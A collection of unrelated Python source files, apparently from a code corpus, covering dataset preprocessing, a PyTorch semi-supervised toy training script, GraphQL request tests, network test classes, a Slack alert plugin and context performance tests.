corpus = (rename_set_doc_keys(doc) for doc in get_codesearchnet_language_set_corpus(language, set_))
data_manager.save_language_corpus(corpus, language, set_)
def parse_dedupe_definitions(data_manager: DataManager, language: str):
dedupe_definitions_pkl_path = os.path.join(
shared.CODESEARCHNET_DATA_DIR, f'{language}_dedupe_definitions_v2')
dedupe_definitions = serialize.load('pickle', dedupe_definitions_pkl_path)
corpus = (rename_dedupe_definitions_keys(doc) for doc in dedupe_definitions)
data_manager.save_language_corpus(corpus, language, shared.DataSet.ALL)
def main():
data_manager = get_base_languages_data_manager()
for language in shared.LANGUAGES:
print(f'Preparing {language}')
parse_dedupe_definitions(data_manager, language)
for set_ in shared.DataSet.split_data_sets():
print(set_)
combine_language_set_corpus(data_manager, language, set_)
if __name__ == '__main__':
main()
|
11482582
|
import os
def create_dirs(dirs):
"""
dirs - a list of directories to create if these directories are not found
:param dirs:
    :return exit_code: 0 on success; on failure the process exits with code -1
"""
try:
for dir_ in dirs:
if not os.path.exists(dir_):
os.makedirs(dir_)
return 0
except Exception as err:
print("Creating directories error: {0}".format(err))
exit(-1)
def clean_dir(dir, prefix):
"""
Clean the given dir from every file starting with prefix
:param dir:
    :param prefix:
:return:
"""
try:
for filename in os.listdir(dir):
if filename.startswith(prefix):
os.remove(os.path.join(dir, filename))
except Exception as err:
print("Cleaning directory error: {0}".format(err))
|
11482598
|
from ._symbol import Symbol
from plotly.graph_objs.layout.mapbox.layer import symbol
from ._line import Line
from ._fill import Fill
from ._circle import Circle
|
11482603
|
import job_helper
import click
@job_helper.job('toy2d_train', enumerate_job_names=False)
def train_toy2d(submit_config: job_helper.SubmitConfig, dataset, region_erode_radius, img_noise_std,
n_sup, balance_classes, seed,
sup_path, model, n_hidden, hidden_size, hidden_act, norm_layer,
perturb_noise_std, dist_contour_range,
conf_thresh, conf_avg,
cons_weight, cons_loss_fn, cons_no_dropout,
learning_rate, teacher_alpha,
num_epochs, batch_size, render_cons_grad, render_pred, device,
save_output):
settings = locals().copy()
del settings['submit_config']
import sys
print('Command line:')
print(' '.join(sys.argv))
print('Settings:')
print(', '.join(['{}={}'.format(k, settings[k]) for k in sorted(settings.keys())]))
import os
import numpy as np
import time
import cv2
from scipy.ndimage.morphology import distance_transform_edt
import optim_weight_ema
from toy2d import generate_data
from datapipe.seg_data import RepeatSampler
import torch, torch.nn as nn, torch.nn.functional as F
import torch.utils.data
rng = np.random.RandomState(seed)
# Generate/load the dataset
if dataset.startswith('img:'):
# Generate a dataset from a black and white image
image_path = dataset[4:]
ds = generate_data.classification_dataset_from_image(image_path, region_erode_radius, img_noise_std, n_sup, balance_classes, rng)
image = ds.image
elif dataset == 'spiral':
# Generate a spiral dataset
ds = generate_data.spiral_classification_dataset(n_sup, balance_classes, rng)
image = None
else:
print('Unknown dataset {}, should be spiral or img:<path>'.format(dataset))
return
# If a path to a supervised dataset has been provided, load it
if sup_path is not None:
ds.load_supervised(sup_path)
# If we are constraining perturbations to lie along the contours of the distance map to the ground truth class boundary
if dist_contour_range > 0.0:
if image is None:
print('Constraining perturbations to lying on distance map contours is only supported for \'image\' experiments')
return
img_1 = image >= 0.5
# Compute signed distance map to boundary
dist_1 = distance_transform_edt(img_1)
dist_0 = distance_transform_edt(~img_1)
dist_map = dist_1 * img_1 + -dist_0 * (~img_1)
else:
dist_map = None
# PyTorch device
torch_device = torch.device(device)
# Convert perturbation noise std-dev to [y,x]
try:
perturb_noise_std = np.array([float(x.strip()) for x in perturb_noise_std.split(',')])
except ValueError:
perturb_noise_std = np.array([6.0, 6.0])
# Assume that perturbation noise std-dev is in pixel space (for image experiments), so convert
perturb_noise_std_real_scale = perturb_noise_std / ds.img_scale * 2.0
perturb_noise_std_real_scale = torch.tensor(perturb_noise_std_real_scale, dtype=torch.float, device=torch_device)
# Define the neural network model (an MLP)
class Network (nn.Module):
def __init__(self):
super(Network, self).__init__()
self.drop = nn.Dropout()
hidden = []
chn_in = 2
for i in range(n_hidden):
if norm_layer == 'spectral_norm':
hidden.append(nn.utils.spectral_norm(nn.Linear(chn_in, hidden_size)))
elif norm_layer == 'weight_norm':
hidden.append(nn.utils.weight_norm(nn.Linear(chn_in, hidden_size)))
else:
hidden.append(nn.Linear(chn_in, hidden_size))
if norm_layer == 'batch_norm':
hidden.append(nn.BatchNorm1d(hidden_size))
elif norm_layer == 'group_norm':
hidden.append(nn.GroupNorm(4, hidden_size))
if hidden_act == 'relu':
hidden.append(nn.ReLU())
elif hidden_act == 'lrelu':
hidden.append(nn.LeakyReLU(0.01))
else:
raise ValueError
chn_in = hidden_size
self.hidden = nn.Sequential(*hidden)
# Final layer; 2-class output
self.l_final = nn.Linear(chn_in, 2)
def forward(self, x, use_dropout=True):
x = self.hidden(x)
if use_dropout:
x = self.drop(x)
x = self.l_final(x)
return x
# Build student network, optimizer and supervised loss criterion
student_net = Network().to(torch_device)
student_params = list(student_net.parameters())
student_optimizer = torch.optim.Adam(student_params, lr=learning_rate)
classification_criterion = nn.CrossEntropyLoss()
# Build teacher network and optimizer
if model == 'mean_teacher':
teacher_net = Network().to(torch_device)
teacher_params = list(teacher_net.parameters())
for param in teacher_params:
param.requires_grad = False
teacher_optimizer = optim_weight_ema.EMAWeightOptimizer(teacher_net, student_net, ema_alpha=teacher_alpha)
pred_net = teacher_net
else:
teacher_net = None
teacher_optimizer = None
pred_net = student_net
# Robust BCE helper
def robust_binary_crossentropy(pred, tgt):
inv_tgt = -tgt + 1.0
inv_pred = -pred + 1.0 + 1e-6
return -(tgt * torch.log(pred + 1.0e-6) + inv_tgt * torch.log(inv_pred))
# If we are constraining perturbations to lie on distance map contours, load the distance map as a Torch tensor
if dist_contour_range > 0.0:
t_dist_map = torch.tensor(dist_map[None, None, ...], dtype=torch.float, device=torch_device)
else:
t_dist_map = None
# Helper function to compute confidence thresholding factor
def conf_factor(teacher_pred_prob):
# Compute confidence
conf_tea = torch.max(teacher_pred_prob, 1)[0]
conf_tea = conf_tea.detach()
# Compute factor based on threshold and `conf_avg` flag
if conf_thresh > 0.0:
conf_fac = (conf_tea >= conf_thresh).float()
else:
conf_fac = torch.ones(conf_tea.shape, dtype=torch.float, device=conf_tea.device)
if conf_avg:
conf_fac = torch.ones_like(conf_fac) * conf_fac.mean()
return conf_fac
# Helper function that constrains consistency loss to operate only when perturbations lie along
# distance map contours.
# When this feature is enabled, it masks to zero the loss for any unsupervised sample whose random perturbation
# deviates too far from the distance map contour
def dist_map_weighting(t_dist_map, batch_u_X, batch_u_X_1):
if t_dist_map is not None and dist_contour_range > 0:
# For each sample in `batch_u_X` and `batch_u_X_1`, both of which are
# of shape `[n_points, [y,x]]` we want to get the value from the
# distance map. For this we use `torch.nn.functional.grid_sample`.
# This function expects grid look-up co-ordinates to have
# the shape `[batch, height, width, [x, y]]`.
# We reshape `batch_u_X` and `batch_u_X_1` to `[1, 1, n_points, [x,y]]` and stack along
# the height dimension, making two rows to send to `grid_sample`.
# The final shape will be `[1, 2, n_points, [x,y]]`:
# 1 sample (1 image)
# 2 rows; batch_u_X and batch_u_X_1
# n_points columns
# (x,y)
# `[n_points, [y,x]]` -> `[1, 1, n_points, [x,y]]`
sample_points_0 = torch.cat([batch_u_X[:, 1].view(1, 1, -1, 1),
batch_u_X[:, 0].view(1, 1, -1, 1)], dim=3)
# `[n_points, [y,x]]` -> `[1, 1, n_points, [x,y]]`
sample_points_1 = torch.cat([batch_u_X_1[:, 1].view(1, 1, -1, 1),
batch_u_X_1[:, 0].view(1, 1, -1, 1)], dim=3)
# -> `[1, 2, n_points, [x,y]]`
sample_points = torch.cat([sample_points_0, sample_points_1], dim=1)
# Get distance to class boundary from distance map
dist_from_boundary = F.grid_sample(t_dist_map, sample_points)
# Get the squared difference between the distances from `batch_u_X` to the boundary
# and the distances from `batch_u_X_1` to the boundary.
delta_dist_sqr = (dist_from_boundary[0, 0, 0, :] - dist_from_boundary[0, 0, 1, :]).pow(2)
# Per-sample loss mask based on difference between distances
weight = (delta_dist_sqr <= (dist_contour_range*dist_contour_range)).float()
return weight
else:
return torch.ones(len(batch_u_X), dtype=torch.float, device=batch_u_X.device)
# Supervised dataset, sampler and loader
sup_dataset = torch.utils.data.TensorDataset(torch.tensor(ds.sup_X, dtype=torch.float),
torch.tensor(ds.sup_y, dtype=torch.long))
sup_sampler = RepeatSampler(torch.utils.data.RandomSampler(sup_dataset))
sup_sep_loader = torch.utils.data.DataLoader(sup_dataset, batch_size, sampler=sup_sampler, num_workers=1)
# Unsupervised dataset, sampler and loader
unsup_dataset = torch.utils.data.TensorDataset(torch.tensor(ds.unsup_X, dtype=torch.float))
unsup_sampler = torch.utils.data.RandomSampler(unsup_dataset)
unsup_loader = torch.utils.data.DataLoader(unsup_dataset, batch_size, sampler=unsup_sampler, num_workers=1)
# Complete dataset and loader
all_dataset = torch.utils.data.TensorDataset(torch.tensor(ds.X, dtype=torch.float))
all_loader = torch.utils.data.DataLoader(all_dataset, 16384, shuffle=False, num_workers=1)
# Grid points used to render visualizations
vis_grid_dataset = torch.utils.data.TensorDataset(torch.tensor(ds.px_grid_vis, dtype=torch.float))
vis_grid_loader = torch.utils.data.DataLoader(vis_grid_dataset, 16384, shuffle=False, num_workers=1)
# Evaluation mode initially
student_net.eval()
if teacher_net is not None:
teacher_net.eval()
# Compute the magnitude of the gradient of the consistency loss at the logits
def consistency_loss_logit_grad_mag(batch_u_X):
u_shape = batch_u_X.shape
batch_u_X_1 = batch_u_X + torch.randn(u_shape, dtype=torch.float, device=torch_device) * \
perturb_noise_std_real_scale[None, :]
student_optimizer.zero_grad()
grads = [None]
if teacher_net is not None:
teacher_unsup_logits = teacher_net(batch_u_X).detach()
else:
teacher_unsup_logits = student_net(batch_u_X)
teacher_unsup_prob = F.softmax(teacher_unsup_logits, dim=1)
student_unsup_logits = student_net(batch_u_X_1)
def grad_hook(grad):
grads[0] = torch.sqrt((grad*grad).sum(dim=1))
student_unsup_logits.register_hook(grad_hook)
student_unsup_prob = F.softmax(student_unsup_logits, dim=1)
weight = dist_map_weighting(t_dist_map, batch_u_X, batch_u_X_1)
mod_fac = conf_factor(teacher_unsup_prob) * weight
if cons_loss_fn == 'bce':
aug_loss = robust_binary_crossentropy(student_unsup_prob, teacher_unsup_prob)
aug_loss = aug_loss.mean(dim=1) * mod_fac
unsup_loss = aug_loss.mean()
elif cons_loss_fn == 'var':
d_aug_loss = student_unsup_prob - teacher_unsup_prob
aug_loss = d_aug_loss * d_aug_loss
aug_loss = aug_loss.mean(dim=1) * mod_fac
unsup_loss = aug_loss.mean()
elif cons_loss_fn == 'logits_var':
d_aug_loss = student_unsup_logits - teacher_unsup_logits
aug_loss = d_aug_loss * d_aug_loss
aug_loss = aug_loss.mean(dim=1) * mod_fac
unsup_loss = aug_loss.mean()
else:
raise ValueError
unsup_loss.backward()
return (grads[0].cpu().numpy(),)
# Helper function for rendering an output image for visualization
def render_output_image():
# Generate output for plotting
with torch.no_grad():
vis_pred = []
vis_grad = [] if render_cons_grad else None
for (batch_X,) in vis_grid_loader:
batch_X = batch_X.to(torch_device)
batch_pred_logits = pred_net(batch_X)
if render_pred == 'prob':
batch_vis = F.softmax(batch_pred_logits, dim=1)[:, 1]
elif render_pred == 'class':
batch_vis = torch.argmax(batch_pred_logits, dim=1)
else:
raise ValueError('Unknown prediction render {}'.format(render_pred))
batch_vis = batch_vis.detach().cpu().numpy()
vis_pred.append(batch_vis)
if render_cons_grad:
batch_grad = consistency_loss_logit_grad_mag(batch_X)
vis_grad.append(batch_grad.detach().cpu().numpy())
vis_pred = np.concatenate(vis_pred, axis=0)
if render_cons_grad:
vis_grad = np.concatenate(vis_grad, axis=0)
out_image = ds.semisup_image_plot(vis_pred, vis_grad)
return out_image
# Output image for first frame
if save_output and submit_config.run_dir is not None:
plot_path = os.path.join(submit_config.run_dir, 'epoch_{:05d}.png'.format(0))
cv2.imwrite(plot_path, render_output_image())
else:
cv2.imshow('Vis', render_output_image())
k = cv2.waitKey(1)
# Train
print('|sup|={}'.format(len(ds.sup_X)))
print('|unsup|={}'.format(len(ds.unsup_X)))
print('|all|={}'.format(len(ds.X)))
print('Training...')
terminated = False
for epoch in range(num_epochs):
t1 = time.time()
student_net.train()
if teacher_net is not None:
teacher_net.train()
batch_sup_loss_accum = 0.0
batch_conf_mask_sum_accum = 0.0
batch_cons_loss_accum = 0.0
batch_N_accum = 0.0
for sup_batch, unsup_batch in zip(sup_sep_loader, unsup_loader):
(batch_X, batch_y) = sup_batch
(batch_u_X,) = unsup_batch
batch_X = batch_X.to(torch_device)
batch_y = batch_y.to(torch_device)
batch_u_X = batch_u_X.to(torch_device)
# Apply perturbation to generate `batch_u_X_1`
aug_perturbation = torch.randn(batch_u_X.shape, dtype=torch.float, device=torch_device)
batch_u_X_1 = batch_u_X + aug_perturbation * perturb_noise_std_real_scale[None, :]
# Supervised loss path
student_optimizer.zero_grad()
student_sup_logits = student_net(batch_X)
sup_loss = classification_criterion(student_sup_logits, batch_y)
if cons_weight > 0.0:
# Consistency loss path
# Logits are computed differently depending on model
if model == 'mean_teacher':
teacher_unsup_logits = teacher_net(batch_u_X, use_dropout=not cons_no_dropout).detach()
student_unsup_logits = student_net(batch_u_X_1, use_dropout=not cons_no_dropout)
elif model == 'pi':
teacher_unsup_logits = student_net(batch_u_X, use_dropout=not cons_no_dropout)
student_unsup_logits = student_net(batch_u_X_1, use_dropout=not cons_no_dropout)
elif model == 'pi_onebatch':
batch_both = torch.cat([batch_u_X, batch_u_X_1], dim=0)
both_unsup_logits = student_net(batch_both, use_dropout=not cons_no_dropout)
teacher_unsup_logits = both_unsup_logits[:len(batch_u_X)]
student_unsup_logits = both_unsup_logits[len(batch_u_X):]
else:
raise RuntimeError
# Compute predicted probabilities
teacher_unsup_prob = F.softmax(teacher_unsup_logits, dim=1)
student_unsup_prob = F.softmax(student_unsup_logits, dim=1)
# Distance map weighting
# (if dist_contour_range is 0 then weight will just be 1)
weight = dist_map_weighting(t_dist_map, batch_u_X, batch_u_X_1)
# Confidence thresholding
conf_fac = conf_factor(teacher_unsup_prob)
mod_fac = conf_fac * weight
# Compute consistency loss
if cons_loss_fn == 'bce':
aug_loss = robust_binary_crossentropy(student_unsup_prob, teacher_unsup_prob)
aug_loss = aug_loss.mean(dim=1) * mod_fac
cons_loss = aug_loss.sum() / weight.sum()
elif cons_loss_fn == 'var':
d_aug_loss = student_unsup_prob - teacher_unsup_prob
aug_loss = d_aug_loss * d_aug_loss
aug_loss = aug_loss.mean(dim=1) * mod_fac
cons_loss = aug_loss.sum() / weight.sum()
elif cons_loss_fn == 'logits_var':
d_aug_loss = student_unsup_logits - teacher_unsup_logits
aug_loss = d_aug_loss * d_aug_loss
aug_loss = aug_loss.mean(dim=1) * mod_fac
cons_loss = aug_loss.sum() / weight.sum()
else:
raise ValueError
# Combine supervised and consistency loss
loss = sup_loss + cons_loss * cons_weight
conf_rate = float(conf_fac.sum())
else:
loss = sup_loss
conf_rate = 0.0
cons_loss = 0.0
loss.backward()
student_optimizer.step()
if teacher_optimizer is not None:
teacher_optimizer.step()
batch_sup_loss_accum += float(sup_loss)
batch_conf_mask_sum_accum += conf_rate
batch_cons_loss_accum += float(cons_loss)
batch_N_accum += len(batch_X)
if batch_N_accum > 0:
batch_sup_loss_accum /= batch_N_accum
batch_conf_mask_sum_accum /= batch_N_accum
batch_cons_loss_accum /= batch_N_accum
student_net.eval()
if teacher_net is not None:
teacher_net.eval()
# Generate output for plotting
if save_output and submit_config.run_dir is not None:
plot_path = os.path.join(submit_config.run_dir, 'epoch_{:05d}.png'.format(epoch + 1))
cv2.imwrite(plot_path, render_output_image())
else:
cv2.imshow('Vis', render_output_image())
k = cv2.waitKey(1)
if (k & 255) == 27:
terminated = True
break
t2 = time.time()
# print('Epoch {}: took {:.3f}s: clf loss={:.6f}'.format(epoch, t2-t1, clf_loss))
print('Epoch {}: took {:.3f}s: clf loss={:.6f}, conf rate={:.3%}, cons loss={:.6f}'.format(
epoch+1, t2-t1, batch_sup_loss_accum, batch_conf_mask_sum_accum, batch_cons_loss_accum))
# Get final score based on all samples
all_pred_y = []
with torch.no_grad():
for (batch_X,) in all_loader:
batch_X = batch_X.to(torch_device)
batch_pred_logits = pred_net(batch_X)
batch_pred_cls = torch.argmax(batch_pred_logits, dim=1)
all_pred_y.append(batch_pred_cls.detach().cpu().numpy())
all_pred_y = np.concatenate(all_pred_y, axis=0)
err_rate = (all_pred_y != ds.y).mean()
print('FINAL RESULT: Error rate={:.6%} (supervised and unsupervised samples)'.format(err_rate))
if not save_output:
# Close output window
if not terminated:
cv2.waitKey()
cv2.destroyAllWindows()
@click.command()
@click.option('--job_desc', type=str, default='')
@click.option('--dataset', type=str, default='spiral')
@click.option('--region_erode_radius', type=int, default=35)
@click.option('--img_noise_std', type=float, default=2.0)
@click.option('--n_sup', type=int, default=10)
@click.option('--balance_classes', is_flag=True, default=False)
@click.option('--seed', type=int, default=12345)
@click.option('--sup_path', type=click.Path(dir_okay=False, file_okay=True, exists=True))
@click.option('--model', type=click.Choice(['mean_teacher', 'pi', 'pi_onebatch']), default='mean_teacher')
@click.option('--n_hidden', type=int, default=3)
@click.option('--hidden_size', type=int, default=512)
@click.option('--hidden_act', type=click.Choice(['relu', 'lrelu']), default='relu')
@click.option('--norm_layer', type=click.Choice(['none', 'batch_norm', 'weight_norm',
'spectral_norm', 'group_norm']), default='batch_norm')
@click.option('--perturb_noise_std', type=str, default='6.0')
@click.option('--dist_contour_range', type=float, default=0.0)
@click.option('--conf_thresh', type=float, default=0.97)
@click.option('--conf_avg', is_flag=True, default=False)
@click.option('--cons_weight', type=float, default=10.0)
@click.option('--cons_loss_fn', type=click.Choice(['var', 'bce', 'logits_var']), default='var')
@click.option('--cons_no_dropout', is_flag=True, default=False)
@click.option('--learning_rate', type=float, default=2e-4)
@click.option('--teacher_alpha', type=float, default=0.99)
@click.option('--num_epochs', type=int, default=100)
@click.option('--batch_size', type=int, default=512)
@click.option('--render_cons_grad', is_flag=True, default=False)
@click.option('--render_pred', type=click.Choice(['class', 'prob']), default='prob')
@click.option('--device', type=str, default='cuda:0')
@click.option('--save_output', is_flag=True, default=False)
def experiment(job_desc, dataset, region_erode_radius, img_noise_std, n_sup, balance_classes, seed,
sup_path, model, n_hidden, hidden_size, hidden_act, norm_layer,
perturb_noise_std, dist_contour_range,
conf_thresh, conf_avg,
cons_weight, cons_loss_fn, cons_no_dropout,
learning_rate, teacher_alpha,
num_epochs, batch_size, render_cons_grad, render_pred, device, save_output):
params = locals().copy()
train_toy2d.submit(**params)
if __name__ == '__main__':
experiment()
|
11482606
|
import json
def test_attempt_parse_request_missing_content_type_raises_bad_request_error(
client, snapshot
):
response = client.post("/", data="")
assert response.status_code == 400
snapshot.assert_match(response.text)
def test_attempt_parse_non_json_request_raises_bad_request_error(client, snapshot):
response = client.post("/", data="", headers={"content-type": "text/plain"})
assert response.status_code == 400
snapshot.assert_match(response.text)
def test_attempt_parse_non_json_request_body_raises_bad_request_error(client, snapshot):
response = client.post("/", data="", headers={"content-type": "application/json"})
assert response.status_code == 400
snapshot.assert_match(response.text)
def test_attempt_parse_json_scalar_request_raises_graphql_bad_request_error(
client, snapshot
):
response = client.post("/", json="json string")
assert response.status_code == 400
snapshot.assert_match(response.text)
def test_attempt_parse_json_array_request_raises_graphql_bad_request_error(
client, snapshot
):
response = client.post("/", json=[1, 2, 3])
assert response.status_code == 400
snapshot.assert_match(response.text)
def test_multipart_form_request_fails_if_operations_is_not_valid_json(client, snapshot):
response = client.post(
"/",
data={
"operations": "not a valid json",
"map": json.dumps({"0": ["variables.file"]}),
},
files={"0": ("test.txt", "hello")},
)
assert response.status_code == 400
snapshot.assert_match(response.content)
def test_multipart_form_request_fails_if_map_is_not_valid_json(client, snapshot):
response = client.post(
"/",
data={
"operations": json.dumps(
{
"query": "mutation($file: Upload!) { upload(file: $file) }",
"variables": {"file": None},
}
),
"map": "not a valid json",
},
files={"0": ("test.txt", "hello")},
)
assert response.status_code == 400
snapshot.assert_match(response.content)
|
11482611
|
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
class AtmCell(Base):
__slots__ = ()
_SDM_NAME = 'atmCell'
_SDM_ATT_MAP = {
'AtmCellVpi': 'atmCell.atmCell.vpi-1',
'AtmCellVci': 'atmCell.atmCell.vci-2',
'AtmCellPti': 'atmCell.atmCell.pti-3',
'AtmCellCellRelayCbit': 'atmCell.atmCell.cellRelayCbit-4',
'AtmCellCellData': 'atmCell.atmCell.cellData-5',
}
def __init__(self, parent, list_op=False):
super(AtmCell, self).__init__(parent, list_op)
@property
def AtmCellVpi(self):
"""
Display Name: VPI
Default Value: 0
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['AtmCellVpi']))
@property
def AtmCellVci(self):
"""
Display Name: VCI
Default Value: 32
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['AtmCellVci']))
@property
def AtmCellPti(self):
"""
Display Name: PTI
Default Value: 1
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['AtmCellPti']))
@property
def AtmCellCellRelayCbit(self):
"""
Display Name: Cell Relay Cbit
Default Value: 0
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['AtmCellCellRelayCbit']))
@property
def AtmCellCellData(self):
"""
Display Name: Cell Data
Default Value: 0xAAAA030000000800450000200000000040FF5BDC0A00000214000002DDDDDDDDDDDDDDDDDDDDDDDD00000028BF1E07A2
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['AtmCellCellData']))
def add(self):
return self._create(self._map_locals(self._SDM_ATT_MAP, locals()))
|
11482619
|
import json
import os
import requests
from cabot.cabotapp.alert import AlertPlugin
from django.conf import settings
from django.template import Template, Context
TEXT_TEMPLATE = "<{{ scheme }}://{{ host }}{% url 'service' pk=service.id %}|{{ service.name }}> {{ message }}"
URL_TEMPLATE = "{{ scheme }}://{{ host }}{% url 'result' pk=check.last_result.id %}"
MESSAGES_BY_STATUS = {
"PASSING": "has returned to normal! :up:",
"WARNING": "is reporting WARNING. :warning:",
"ERROR": "is reporting ERROR. :negative_squared_cross_mark:",
"CRITICAL": "is reporting CRITICAL errors! :skull::sos:",
}
class SlackAlert(AlertPlugin):
name = "Slack"
author = "<NAME>"
def send_alert(self, service, users, duty_officers):
self._send_alert(service, acked=False)
def send_alert_update(self, service, users, duty_officers):
self._send_alert(service, acked=True)
def _send_alert(self, service, acked):
overall_status = service.overall_status
if not (acked and overall_status != "PASSING"):
message = MESSAGES_BY_STATUS[overall_status]
else:
user = service.unexpired_acknowledgement().user
name = user.first_name or user.username
message = "is being worked on by {}. :hammer:".format(name)
context = Context({
"scheme": settings.WWW_SCHEME,
"host": settings.WWW_HTTP_HOST,
"service": service,
"message": message,
})
text = Template(TEXT_TEMPLATE).render(context)
attachments = []
for check in service.all_failing_checks():
if check.importance == "WARNING":
color = "warning"
else:
color = "danger"
check_context = Context({
"scheme": settings.WWW_SCHEME,
"host": settings.WWW_HTTP_HOST,
"check": check,
})
url = Template(URL_TEMPLATE).render(check_context)
attachment = {
"fallback": "{}: {}: {}".format(check.name, check.importance, url),
"title": check.name,
"title_link": url,
"text": check.last_result().error,
"color": color,
}
attachments.append(attachment)
self._send_slack_webhook(text, attachments)
def _send_slack_webhook(self, text, attachments):
url = os.environ["SLACK_WEBHOOK_URL"]
channel = os.environ["SLACK_ALERT_CHANNEL"]
response = requests.post(url, data=json.dumps({
"username": "Cabot",
"icon_emoji": ":dog2:",
"channel": channel,
"text": text,
"attachments": attachments,
}))
response.raise_for_status()
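# Deployment note: _send_slack_webhook reads its configuration from two environment
# variables, SLACK_WEBHOOK_URL (a Slack incoming-webhook URL) and SLACK_ALERT_CHANNEL
# (e.g. "#ops-alerts"); both must be set before the plugin can post alerts.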
|
11482644
|
import os
from .core import Base
DEFAULT_SETTINGS = {
"HALT_ON_ERROR": True,
"LOG_FORMAT": '%(log_color)s[%(name)s]: %(message)s',
"LOG_COLORS": {
'DEBUG': 'cyan',
'INFO': 'green',
'WARNING': 'yellow',
'ERROR': 'red',
'CRITICAL': 'bold_red',
}
}
SULTAN_SETTINGS_MODULE_ENV = 'SULTAN_SETTINGS_MODULE'
class Settings(Base):
def __init__(self):
super(Settings, self).__init__()
self._settings = DEFAULT_SETTINGS.copy()
self._load_setting_module()
    def _load_setting_module(self):
        if SULTAN_SETTINGS_MODULE_ENV in os.environ:
            settings = __import__(os.environ[SULTAN_SETTINGS_MODULE_ENV])
            # a module object has no .items(); copy its public attributes instead
            for k, v in vars(settings).items():
                if not k.startswith('_'):
                    self._settings[k] = v
def __getattr__(self, attr):
try:
return self._settings[attr]
except KeyError:
raise ValueError("Invalid Setting '%s'." % (attr))
settings = Settings()
|
11482680
|
import socket
sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 1)
sock.bind(('::', 8080))
sock.listen()
print(sock.accept())
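# A minimal client sketch for the listener above (assumes it is running on this host):
#
#   import socket
#   with socket.create_connection(('::1', 8080)) as conn:
#       pass  # the accept() call above returns once this connection arrives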
|
11482717
|
from .base_shard_strategy import BaseShardStrategy
from .bucket_tensor_shard_strategy import BucketTensorShardStrategy
from .tensor_shard_strategy import TensorShardStrategy
__all__ = ['BaseShardStrategy', 'TensorShardStrategy', 'BucketTensorShardStrategy']
|
11482721
|
from __future__ import print_function
# Standard library imports
import unittest
import timeit
# Enthought library imports
from traits.testing.api import performance
from codetools.contexts.tests.abstract_context_test_case import AbstractContextTestCase
from codetools.contexts.data_context import DataContext
from codetools.contexts.multi_context import MultiContext
from codetools.contexts.api import AdaptedDataContext
##########################################################################
#
# These tests used to be in:
#
# enthought/contexts/tests/
#
# data_context_test_case.py
# multi_context_test_case.py
# context_with_unit_conversion_adapter_test_case.py
class DataContextTestCase(AbstractContextTestCase):
#### AbstactContextTestCase interface ######################################
def context_factory(self, *args, **kw):
""" Return the type of context we are testing.
"""
return DataContext(*args, **kw)
def matched_input_output_pair(self):
""" Return values for testing dictionary get/set, etc.
"""
return 1.2, 1.2
@performance
def test_eval_is_not_slow(self):
""" eval() with DataContext is the speed of a dict. (slowdown < 2.0)
This is test using a vp array with 20 values in it to try and get
a reasonable use case.
"""
### Parameters ########################################################
# Slowdown we will allow compared to standard python evaluation
allowed_slowdown = 2.0
# Number of timer iterations.
N = 10000
### Standard execution ################################################
setup = "from numpy import arange\n" \
"vp=arange(20.)\n"
expr = 'vp+vp+vp+vp+vp+vp'
std = timeit.Timer(expr, setup)
std_res = std.timeit(N)
### Eval execution ####################################################
# Note: This is not used, but it is here for reference
#
# eval is actually slower (by an order or so of magnitude for single
# numbers) than a simple expression. But for our array, it should be
# about the same speed.
compiled_setup = "compiled_expr = compile('%s','expr','eval')\n" % expr
eval_setup = setup + compiled_setup
eval_expr = "eval(compiled_expr)"
eval_timer = timeit.Timer(eval_expr, eval_setup)
eval_res = eval_timer.timeit(N)
### DataContext execution #############################################
this_setup = "from codetools.contexts.data_context import DataContext\n" \
"context=DataContext()\n" \
"context['vp'] = vp\n"
context_setup = setup + this_setup + compiled_setup
context_expr = "eval(compiled_expr, globals(), context)"
context_timer = timeit.Timer(context_expr, context_setup)
context_res = context_timer.timeit(N)
slowdown = context_res/std_res
msg = 'actual slowdown: %f\nallowed slowdown: %f' % (slowdown, allowed_slowdown)
assert slowdown < allowed_slowdown, msg
class MultiContextTestCase(AbstractContextTestCase):
############################################################################
# AbstractContextTestCase interface
############################################################################
def context_factory(self, *args, **kw):
""" Return the type of context we are testing.
"""
return MultiContext(DataContext(*args, **kw))
def matched_input_output_pair(self):
""" Return values for testing dictionary get/set, etc.
"""
return 1.2, 1.2
############################################################################
# MultiContext2TestCase interface
############################################################################
@performance
def test_eval_is_not_slow(self):
""" eval() with DataContext is the speed of a dict. (slowdown < 1.3)
This is test using a vp array with 20 values in it to try and get
a reasonable use case.
"""
### Parameters #########################################################
# Slowdown we will allow compared to standard python evaluation
allowed_slowdown = 1.5
# Number of timer iterations.
N = 10000
### Standard execution #################################################
setup = "from numpy import arange\n" \
"vp=arange(20.)\n"
expr = 'vp+vp+vp+vp+vp+vp'
std = timeit.Timer(expr, setup)
std_res = std.timeit(N)
### Eval execution #####################################################
# Note: This is not used, but it is here for reference
#
# eval is actually slower (by an order or so of magnitude for single
# numbers) than a simple expression. But for our array, it should be
# about the same speed.
compiled_setup = "compiled_expr = compile(%r,'expr','eval')\n" % expr
eval_setup = setup + compiled_setup
eval_expr = "eval(compiled_expr)"
eval_timer = timeit.Timer(eval_expr, eval_setup)
eval_res = eval_timer.timeit(N)
### DataContext execution ##############################################
this_setup = "from codetools.contexts.api import MultiContext\n" \
"context=MultiContext()\n" \
"context['vp'] = vp\n"
context_setup = setup + this_setup + compiled_setup
context_expr = "eval(compiled_expr, globals(), context)"
context_timer = timeit.Timer(context_expr, context_setup)
        context_res = context_timer.timeit(N)
slowdown = context_res/std_res
msg = 'actual slowdown: %f' % slowdown
assert slowdown < allowed_slowdown, msg
class UnitConversionContextAdapterTestCase(unittest.TestCase):
""" Other tests for UnitConversionContextAdapater
"""
############################################################################
# TestCase interface
############################################################################
def setUp(self):
self.context = AdaptedDataContext(context=DataContext())
@performance
def test_exec_is_not_slow(self):
""" Compare exec with Adapter to the speed of a dict. (slowdown < 2.5)
